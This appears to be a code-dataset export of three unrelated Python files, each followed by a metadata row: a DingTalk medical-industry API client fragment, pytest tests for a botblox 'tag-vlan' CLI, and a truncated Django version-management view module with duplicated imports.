    raw = self.do_roarequest('QueryDepartmentInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
async def query_department_info_with_options_async(
    self,
    dept_id: str,
    headers: dingtalkindustry__1__0_models.QueryDepartmentInfoHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryDepartmentInfoResponse:
    """Asynchronously GET one department (path parameter ``dept_id``)."""
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(headers=hdrs)
    response_model = dingtalkindustry__1__0_models.QueryDepartmentInfoResponse()
    raw = await self.do_roarequest_async('QueryDepartmentInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments/{dept_id}', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
def update_user_extend_info(
    self,
    user_id: str,
    request: dingtalkindustry__1__0_models.UpdateUserExtendInfoRequest,
) -> dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse:
    """Update a user's extended info using default headers and runtime options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.UpdateUserExtendInfoHeaders()
    return self.update_user_extend_info_with_options(user_id, request, default_headers, run_opts)
async def update_user_extend_info_async(
    self,
    user_id: str,
    request: dingtalkindustry__1__0_models.UpdateUserExtendInfoRequest,
) -> dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse:
    """Async variant of :meth:`update_user_extend_info` with default options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.UpdateUserExtendInfoHeaders()
    return await self.update_user_extend_info_with_options_async(user_id, request, default_headers, run_opts)
def update_user_extend_info_with_options(
    self,
    user_id: str,
    request: dingtalkindustry__1__0_models.UpdateUserExtendInfoRequest,
    headers: dingtalkindustry__1__0_models.UpdateUserExtendInfoHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse:
    """PUT the user's extended info (job/problem/status codes and comments)."""
    UtilClient.validate_model(request)
    body_map = {}
    # Copy only the request fields the caller actually set.
    if not UtilClient.is_unset(request.job_code):
        body_map['jobCode'] = request.job_code
    if not UtilClient.is_unset(request.user_prob_code):
        body_map['userProbCode'] = request.user_prob_code
    if not UtilClient.is_unset(request.job_status_code):
        body_map['jobStatusCode'] = request.job_status_code
    if not UtilClient.is_unset(request.comments):
        body_map['comments'] = request.comments
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(
        headers=hdrs,
        body=OpenApiUtilClient.parse_to_map(body_map)
    )
    response_model = dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse()
    raw = self.do_roarequest('UpdateUserExtendInfo', 'industry_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/industry/medicals/users/{user_id}/extInfos', 'none', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
async def update_user_extend_info_with_options_async(
    self,
    user_id: str,
    request: dingtalkindustry__1__0_models.UpdateUserExtendInfoRequest,
    headers: dingtalkindustry__1__0_models.UpdateUserExtendInfoHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse:
    """Asynchronously PUT the user's extended info (job/problem/status codes, comments)."""
    UtilClient.validate_model(request)
    body_map = {}
    # Copy only the request fields the caller actually set.
    if not UtilClient.is_unset(request.job_code):
        body_map['jobCode'] = request.job_code
    if not UtilClient.is_unset(request.user_prob_code):
        body_map['userProbCode'] = request.user_prob_code
    if not UtilClient.is_unset(request.job_status_code):
        body_map['jobStatusCode'] = request.job_status_code
    if not UtilClient.is_unset(request.comments):
        body_map['comments'] = request.comments
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(
        headers=hdrs,
        body=OpenApiUtilClient.parse_to_map(body_map)
    )
    response_model = dingtalkindustry__1__0_models.UpdateUserExtendInfoResponse()
    raw = await self.do_roarequest_async('UpdateUserExtendInfo', 'industry_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/industry/medicals/users/{user_id}/extInfos', 'none', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
def query_all_doctors(
    self,
    request: dingtalkindustry__1__0_models.QueryAllDoctorsRequest,
) -> dingtalkindustry__1__0_models.QueryAllDoctorsResponse:
    """List doctors (paged) using default headers and runtime options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryAllDoctorsHeaders()
    return self.query_all_doctors_with_options(request, default_headers, run_opts)
async def query_all_doctors_async(
    self,
    request: dingtalkindustry__1__0_models.QueryAllDoctorsRequest,
) -> dingtalkindustry__1__0_models.QueryAllDoctorsResponse:
    """Async variant of :meth:`query_all_doctors` with default options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryAllDoctorsHeaders()
    return await self.query_all_doctors_with_options_async(request, default_headers, run_opts)
def query_all_doctors_with_options(
    self,
    request: dingtalkindustry__1__0_models.QueryAllDoctorsRequest,
    headers: dingtalkindustry__1__0_models.QueryAllDoctorsHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllDoctorsResponse:
    """GET the doctor list with optional ``pageSize``/``pageNum`` query parameters."""
    UtilClient.validate_model(request)
    query_map = {}
    # Only forward paging parameters that the caller actually set.
    if not UtilClient.is_unset(request.page_size):
        query_map['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_num):
        query_map['pageNum'] = request.page_num
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(
        headers=hdrs,
        query=OpenApiUtilClient.query(query_map)
    )
    response_model = dingtalkindustry__1__0_models.QueryAllDoctorsResponse()
    raw = self.do_roarequest('QueryAllDoctors', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/doctors', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
async def query_all_doctors_with_options_async(
    self,
    request: dingtalkindustry__1__0_models.QueryAllDoctorsRequest,
    headers: dingtalkindustry__1__0_models.QueryAllDoctorsHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllDoctorsResponse:
    """Asynchronously GET the doctor list with optional paging query parameters."""
    UtilClient.validate_model(request)
    query_map = {}
    # Only forward paging parameters that the caller actually set.
    if not UtilClient.is_unset(request.page_size):
        query_map['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_num):
        query_map['pageNum'] = request.page_num
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(
        headers=hdrs,
        query=OpenApiUtilClient.query(query_map)
    )
    response_model = dingtalkindustry__1__0_models.QueryAllDoctorsResponse()
    raw = await self.do_roarequest_async('QueryAllDoctors', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/doctors', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
def query_user_ext_info(
    self,
    user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserExtInfoResponse:
    """Query a user's extended info using default headers and runtime options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryUserExtInfoHeaders()
    return self.query_user_ext_info_with_options(user_id, default_headers, run_opts)
async def query_user_ext_info_async(
    self,
    user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserExtInfoResponse:
    """Async variant of :meth:`query_user_ext_info` with default options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryUserExtInfoHeaders()
    return await self.query_user_ext_info_with_options_async(user_id, default_headers, run_opts)
def query_user_ext_info_with_options(
    self,
    user_id: str,
    headers: dingtalkindustry__1__0_models.QueryUserExtInfoHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserExtInfoResponse:
    """GET a user's extended info (path parameter ``user_id``)."""
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(headers=hdrs)
    response_model = dingtalkindustry__1__0_models.QueryUserExtInfoResponse()
    raw = self.do_roarequest('QueryUserExtInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}/extInfos', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
async def query_user_ext_info_with_options_async(
    self,
    user_id: str,
    headers: dingtalkindustry__1__0_models.QueryUserExtInfoHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserExtInfoResponse:
    """Asynchronously GET a user's extended info (path parameter ``user_id``)."""
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(headers=hdrs)
    response_model = dingtalkindustry__1__0_models.QueryUserExtInfoResponse()
    raw = await self.do_roarequest_async('QueryUserExtInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}/extInfos', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
def query_job_code_dictionary(self) -> dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse:
    """Query the job-code dictionary using default headers and runtime options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryJobCodeDictionaryHeaders()
    return self.query_job_code_dictionary_with_options(default_headers, run_opts)
async def query_job_code_dictionary_async(self) -> dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse:
    """Async variant of :meth:`query_job_code_dictionary` with default options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryJobCodeDictionaryHeaders()
    return await self.query_job_code_dictionary_with_options_async(default_headers, run_opts)
def query_job_code_dictionary_with_options(
    self,
    headers: dingtalkindustry__1__0_models.QueryJobCodeDictionaryHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse:
    """GET the job-code dictionary, honoring caller-supplied headers."""
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(headers=hdrs)
    response_model = dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse()
    raw = self.do_roarequest('QueryJobCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/jobCodes', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
async def query_job_code_dictionary_with_options_async(
    self,
    headers: dingtalkindustry__1__0_models.QueryJobCodeDictionaryHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse:
    """Asynchronously GET the job-code dictionary with explicit headers/runtime."""
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(headers=hdrs)
    response_model = dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse()
    raw = await self.do_roarequest_async('QueryJobCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/jobCodes', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
def query_all_department(
    self,
    request: dingtalkindustry__1__0_models.QueryAllDepartmentRequest,
) -> dingtalkindustry__1__0_models.QueryAllDepartmentResponse:
    """List departments (paged) using default headers and runtime options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryAllDepartmentHeaders()
    return self.query_all_department_with_options(request, default_headers, run_opts)
async def query_all_department_async(
    self,
    request: dingtalkindustry__1__0_models.QueryAllDepartmentRequest,
) -> dingtalkindustry__1__0_models.QueryAllDepartmentResponse:
    """Async variant of :meth:`query_all_department` with default options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryAllDepartmentHeaders()
    return await self.query_all_department_with_options_async(request, default_headers, run_opts)
def query_all_department_with_options(
    self,
    request: dingtalkindustry__1__0_models.QueryAllDepartmentRequest,
    headers: dingtalkindustry__1__0_models.QueryAllDepartmentHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllDepartmentResponse:
    """GET the department list with optional ``pageSize``/``pageNumber`` query parameters."""
    UtilClient.validate_model(request)
    query_map = {}
    # Only forward paging parameters that the caller actually set.
    if not UtilClient.is_unset(request.page_size):
        query_map['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_number):
        query_map['pageNumber'] = request.page_number
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(
        headers=hdrs,
        query=OpenApiUtilClient.query(query_map)
    )
    response_model = dingtalkindustry__1__0_models.QueryAllDepartmentResponse()
    raw = self.do_roarequest('QueryAllDepartment', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
async def query_all_department_with_options_async(
    self,
    request: dingtalkindustry__1__0_models.QueryAllDepartmentRequest,
    headers: dingtalkindustry__1__0_models.QueryAllDepartmentHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllDepartmentResponse:
    """Asynchronously GET the department list with optional paging query parameters."""
    UtilClient.validate_model(request)
    query_map = {}
    # Only forward paging parameters that the caller actually set.
    if not UtilClient.is_unset(request.page_size):
        query_map['pageSize'] = request.page_size
    if not UtilClient.is_unset(request.page_number):
        query_map['pageNumber'] = request.page_number
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(
        headers=hdrs,
        query=OpenApiUtilClient.query(query_map)
    )
    response_model = dingtalkindustry__1__0_models.QueryAllDepartmentResponse()
    raw = await self.do_roarequest_async('QueryAllDepartment', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
def query_group_info(
    self,
    group_id: str,
) -> dingtalkindustry__1__0_models.QueryGroupInfoResponse:
    """Query one group by id using default headers and runtime options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryGroupInfoHeaders()
    return self.query_group_info_with_options(group_id, default_headers, run_opts)
async def query_group_info_async(
    self,
    group_id: str,
) -> dingtalkindustry__1__0_models.QueryGroupInfoResponse:
    """Async variant of :meth:`query_group_info` with default options."""
    run_opts = util_models.RuntimeOptions()
    default_headers = dingtalkindustry__1__0_models.QueryGroupInfoHeaders()
    return await self.query_group_info_with_options_async(group_id, default_headers, run_opts)
def query_group_info_with_options(
    self,
    group_id: str,
    headers: dingtalkindustry__1__0_models.QueryGroupInfoHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryGroupInfoResponse:
    """GET one group (path parameter ``group_id``), honoring caller-supplied headers."""
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(headers=hdrs)
    response_model = dingtalkindustry__1__0_models.QueryGroupInfoResponse()
    raw = self.do_roarequest('QueryGroupInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups/{group_id}', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
async def query_group_info_with_options_async(
    self,
    group_id: str,
    headers: dingtalkindustry__1__0_models.QueryGroupInfoHeaders,
    runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryGroupInfoResponse:
    """Asynchronously GET one group (path parameter ``group_id``)."""
    hdrs = headers.common_headers if not UtilClient.is_unset(headers.common_headers) else {}
    if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
        hdrs['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
    api_req = open_api_models.OpenApiRequest(headers=hdrs)
    response_model = dingtalkindustry__1__0_models.QueryGroupInfoResponse()
    raw = await self.do_roarequest_async('QueryGroupInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups/{group_id}', 'json', api_req, runtime)
    return TeaCore.from_map(response_model, raw)
| 49.706294 | 183 | 0.711874 | 5,368 | 49,756 | 6.150708 | 0.034836 | 0.01369 | 0.105219 | 0.140291 | 0.976921 | 0.954993 | 0.934367 | 0.91671 | 0.896871 | 0.881152 | 0 | 0.013085 | 0.205885 | 49,756 | 1,000 | 184 | 49.756 | 0.822535 | 0.001608 | 0 | 0.77694 | 1 | 0 | 0.078732 | 0.047803 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03556 | false | 0 | 0.007543 | 0 | 0.113147 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
29c3fc61c5a1aa2e63b64a26766e19889f321bb7 | 7,018 | py | Python | tests/tagvlan/test_default_vlan.py | ararobotique/botblox-manager-software | 64c5c893601ea62a7ac414023455e8c2da04816d | [
"MIT"
] | 6 | 2021-04-18T21:30:17.000Z | 2022-01-13T06:37:43.000Z | tests/tagvlan/test_default_vlan.py | ararobotique/botblox-manager-software | 64c5c893601ea62a7ac414023455e8c2da04816d | [
"MIT"
] | 36 | 2020-12-16T12:29:24.000Z | 2021-09-18T14:52:25.000Z | tests/tagvlan/test_default_vlan.py | ararobotique/botblox-manager-software | 64c5c893601ea62a7ac414023455e8c2da04816d | [
"MIT"
] | 2 | 2021-04-08T20:27:48.000Z | 2021-08-30T17:32:28.000Z | from typing import AnyStr, List
from botblox_config.cli import create_parser
from pytest import CaptureFixture
from ..conftest import assert_ip175g_command_is_correct_type, get_data_from_cli_args, run_command_to_error
class TestSetGroups:
    """CLI tests for the ``tag-vlan`` default-VLAN options.

    Covers the all-ports ``-D/--default-vlan`` flag, the per-port
    ``-d/--port-default-vlan`` flag, their combination, and the argparse
    diagnostics emitted for malformed invocations.  The twelve original
    tests shared two copy-pasted bodies; those are factored into the
    ``_assert_config_data`` / ``_assert_cli_error`` helpers while every
    public test name and signature is preserved.
    """

    package: List[str] = ['botblox']
    # Arguments common to every invocation under test.
    base_args: List[str] = [
        '--device',
        'test',
        'tag-vlan',
    ]

    def _assert_config_data(self, extra_args: List[str], expected_result: List[List[int]]) -> None:
        """Parse ``base_args + extra_args`` and compare the generated switch commands."""
        args = self.base_args + extra_args
        data = get_data_from_cli_args(parser=create_parser(args), args=args)
        assert_ip175g_command_is_correct_type(data=data)
        assert data == expected_result

    def _assert_cli_error(
        self,
        capfd: CaptureFixture,
        extra_args: List[str],
        expected_stderr_message: str,
    ) -> None:
        """Run the CLI expecting failure: nothing on stdout, diagnostic on stderr."""
        run_command_to_error(self.package, self.base_args + extra_args)
        captured: CaptureFixture[AnyStr] = capfd.readouterr()
        assert captured.out == ''
        actual_stderr: str = captured.err
        assert actual_stderr.find(expected_stderr_message) > -1

    def test_all_ports(self) -> None:
        self._assert_config_data(
            ['--default-vlan', '20'],
            [
                [23, 7, 20, 0],   # VLAN_INFO_0
                [23, 8, 20, 0],   # VLAN_INFO_1
                [23, 9, 20, 0],   # VLAN_INFO_2
                [23, 11, 20, 0],  # VLAN_INFO_3
                [23, 12, 20, 0],  # VLAN_INFO_4
            ],
        )

    def test_port_only(self) -> None:
        self._assert_config_data(
            ['--port-default-vlan', '2', '20'],
            [
                [23, 8, 20, 0],  # VLAN_INFO_1
            ],
        )

    def test_mixed(self) -> None:
        self._assert_config_data(
            ['--default-vlan', '20', '--port-default-vlan', '2', '21'],
            [
                [23, 7, 20, 0],   # VLAN_INFO_0
                [23, 8, 21, 0],   # VLAN_INFO_1 (per-port value wins)
                [23, 9, 20, 0],   # VLAN_INFO_2
                [23, 11, 20, 0],  # VLAN_INFO_3
                [23, 12, 20, 0],  # VLAN_INFO_4
            ],
        )

    def test_all_ports_wrong_type(
        self,
        capfd: CaptureFixture,
    ) -> None:
        self._assert_cli_error(
            capfd,
            ['--default-vlan', 'WRONG'],
            "tag-vlan: error: argument -D/--default-vlan: invalid VLAN ID value: 'WRONG'",
        )

    def test_all_ports_wrong_num(
        self,
        capfd: CaptureFixture,
    ) -> None:
        self._assert_cli_error(
            capfd,
            ['--default-vlan', '5000'],
            "tag-vlan: error: argument -D/--default-vlan: invalid VLAN ID value: '5000'",
        )

    def test_all_ports_missing_arg(
        self,
        capfd: CaptureFixture,
    ) -> None:
        self._assert_cli_error(
            capfd,
            ['--default-vlan'],
            "tag-vlan: error: argument -D/--default-vlan: expected one argument",
        )

    def test_port(self) -> None:
        # NOTE: duplicates test_port_only; kept so the public test set is unchanged.
        self._assert_config_data(
            ['--port-default-vlan', '2', '20'],
            [
                [23, 8, 20, 0],  # VLAN_INFO_1
            ],
        )

    def test_ports(self) -> None:
        self._assert_config_data(
            ['--port-default-vlan', '2', '20', '--port-default-vlan', '1', '21'],
            [
                [23, 7, 21, 0],  # VLAN_INFO_0
                [23, 8, 20, 0],  # VLAN_INFO_1
            ],
        )

    def test_port_wrong_port_type(
        self,
        capfd: CaptureFixture,
    ) -> None:
        self._assert_cli_error(
            capfd,
            ['--port-default-vlan', 'a', '20'],
            'tag-vlan: error: argument -d/--port-default-vlan: '
            'Error in argument "port{1,2,3,4,5}": Invalid port \'a\'',
        )

    def test_port_wrong_port_num(
        self,
        capfd: CaptureFixture,
    ) -> None:
        self._assert_cli_error(
            capfd,
            ['--port-default-vlan', '6', '20'],
            'tag-vlan: error: argument -d/--port-default-vlan: '
            'Error in argument "port{1,2,3,4,5}": Invalid port \'6\'',
        )

    def test_port_missing_vlan_arg(
        self,
        capfd: CaptureFixture,
    ) -> None:
        self._assert_cli_error(
            capfd,
            ['--port-default-vlan', '1'],
            "tag-vlan: error: argument -d/--port-default-vlan: expected 2 arguments",
        )

    def test_port_missing_both_args(
        self,
        capfd: CaptureFixture,
    ) -> None:
        self._assert_cli_error(
            capfd,
            ['--port-default-vlan'],
            "tag-vlan: error: argument -d/--port-default-vlan: expected 2 arguments",
        )
| 29.364017 | 111 | 0.565831 | 804 | 7,018 | 4.656716 | 0.105721 | 0.061699 | 0.033654 | 0.051282 | 0.915598 | 0.901175 | 0.892628 | 0.887821 | 0.887821 | 0.86859 | 0 | 0.036299 | 0.320889 | 7,018 | 238 | 112 | 29.487395 | 0.749266 | 0.023796 | 0 | 0.711957 | 0 | 0.01087 | 0.125805 | 0.013458 | 0 | 0 | 0 | 0 | 0.13587 | 1 | 0.065217 | false | 0 | 0.021739 | 0 | 0.103261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
29cbd1d2ed653ec831d3123d61fda699495e7080 | 5,891 | py | Python | AutotestWebD/apps/version_manage/views/version_show.py | yangjourney/sosotest | 2e88099a829749910ca325253c9b1a2e368d21a0 | [
"MIT"
] | 422 | 2019-08-18T05:04:20.000Z | 2022-03-31T06:49:19.000Z | AutotestWebD/apps/version_manage/views/version_show.py | LinSongJian1985/sosotest | 091863dee531b5726650bb63efd6f169267cbeb4 | [
"MIT"
] | 10 | 2019-10-24T09:55:38.000Z | 2021-09-29T17:28:43.000Z | AutotestWebD/apps/version_manage/views/version_show.py | LinSongJian1985/sosotest | 091863dee531b5726650bb63efd6f169267cbeb4 | [
"MIT"
] | 202 | 2019-08-18T05:04:27.000Z | 2022-03-30T05:57:18.000Z | from django.shortcuts import render,HttpResponse
from urllib import parse
from apps.interface.services.HTTP_interfaceService import HTTP_interfaceService
from apps.common.config import commonWebConfig
from apps.common.func.CommonFunc import *
from apps.common.func.LanguageFunc import *
from apps.config.services.businessLineService import BusinessService
from apps.config.services.modulesService import ModulesService
from apps.config.services.sourceService import SourceService
from apps.config.services.uriService import UriService
from apps.config.services.serviceConfService import ServiceConfService
from apps.config.services.http_confService import HttpConfService
from apps.config.views.http_conf import getDebugBtn
from apps.common.helper.ApiReturn import ApiReturn
from apps.common.func.WebFunc import *
from AutotestWebD.settings import isRelease
import json,traceback
from django.shortcuts import render,HttpResponse
from urllib import parse
from apps.interface.services.HTTP_interfaceService import HTTP_interfaceService
from apps.common.config import commonWebConfig
from apps.common.func.CommonFunc import *
from apps.common.func.LanguageFunc import *
from apps.config.services.businessLineService import BusinessService
from apps.config.services.modulesService import ModulesService
from apps.config.services.sourceService import SourceService
from apps.config.services.uriService import UriService
from apps.config.services.serviceConfService import ServiceConfService
from apps.config.services.http_confService import HttpConfService
from apps.config.views.http_conf import getDebugBtn
from apps.common.helper.ApiReturn import ApiReturn
from apps.common.func.WebFunc import *
from AutotestWebD.settings import isRelease
import json,traceback
from all_models.models.A0011_version_manage import *
from apps.version_manage.services.common_service import VersionService
# Module-level return-message buffer; appears unused within this module's views.
retmsg = ""
# Module-wide logger bound to the "web" logger configured for the web app.
logger = logging.getLogger("web")
def current_version(request):
    """Render the page showing the active version (``TbVersion`` rows with type=2)."""
    langDict = getLangTextDict(request)  # result unused below; call kept to match original behavior
    context = {}
    if not isRelease:
        context["env"] = "test"
    context["current_version"] = "current-page"
    context["userName"] = request.session.get("userName")
    # Page heading text (Chinese: "view current version info").
    context["text"] = {"pageTitle": "当前版本信息查看"}
    active_versions = TbVersion.objects.filter(type=2)
    if active_versions:
        head = active_versions[0]
        context["versionName"] = head.versionName
        context["versionDesc"] = head.versionDesc
        context["closeTime"] = head.closeTime
    else:
        # Fallbacks when no active version row exists ("version not found").
        context["versionName"] = "没有找到版本"
        context["versionDesc"] = "没有找到版本"
        context["closeTime"] = "None"
    return render(request, "InterfaceTest/version_manage/current_version.html", context)
def history_version(request):
    """Render the page listing closed historical versions (``TbVersion`` type=1)."""
    langDict = getLangTextDict(request)  # result unused below; call kept to match original behavior
    context = {}
    if not isRelease:
        context["env"] = "test"
    context["history_version"] = "current-page"
    context["userName"] = request.session.get("userName")
    # Page heading text (Chinese: "view history version info").
    context["text"] = {"pageTitle": "历史版本信息查看"}
    history_qs = TbVersion.objects.filter(type=1).order_by("-closeTime")
    # Newest-first list of plain dicts for the template.
    context["versionList"] = [
        {
            'versionName': item.versionName,
            'versionDesc': item.versionDesc,
            'closeTime': item.closeTime,
        }
        for item in history_qs
    ]
    return render(request, "InterfaceTest/version_manage/history_version.html", context)
def change_version(request):
    """Switch the session to the requested version and render the matching page.

    ``?version=<name>`` selects a closed historical version; "CurrentVersion"
    (the default) or an unknown name falls back to the current-version page.
    """
    langDict = getLangTextDict(request)  # NOTE(review): result unused below
    context = {}
    if not isRelease:
        context["env"] = "test"
    versionName = request.GET.get("version","CurrentVersion")
    versionHistorySets = TbVersion.objects.filter(type=1).order_by("-closeTime")
    isVersionExist = False
    # Scan the closed (type=1) versions for the requested name.
    for tmpVersion in versionHistorySets:
        if tmpVersion.versionName == versionName:
            isVersionExist = True
    # NOTE(review): source indentation was lost; this call is assumed to run
    # once after the scan (not per matching row) — confirm against the repo.
    VersionService.setLastVersionSession(request)
    if versionName == "CurrentVersion" or isVersionExist == False:
        # Requested name missing or "CurrentVersion": show the current version.
        VersionService.setToCurrentVersion(request)
        context["current_version"] = "current-page"
        context["userName"] = request.session.get("userName")
        # Page heading text (Chinese: "view current version info").
        text = {}
        text["pageTitle"] = "当前版本信息查看"  # langDict["web"]["httpInterfacePageHeadings_check"]
        context["text"] = text
        versionObj = TbVersion.objects.filter(type=2)
        # Fallbacks ("version not found" / "no close time") overridden below when a row exists.
        context["versionName"] = "没有找到版本"
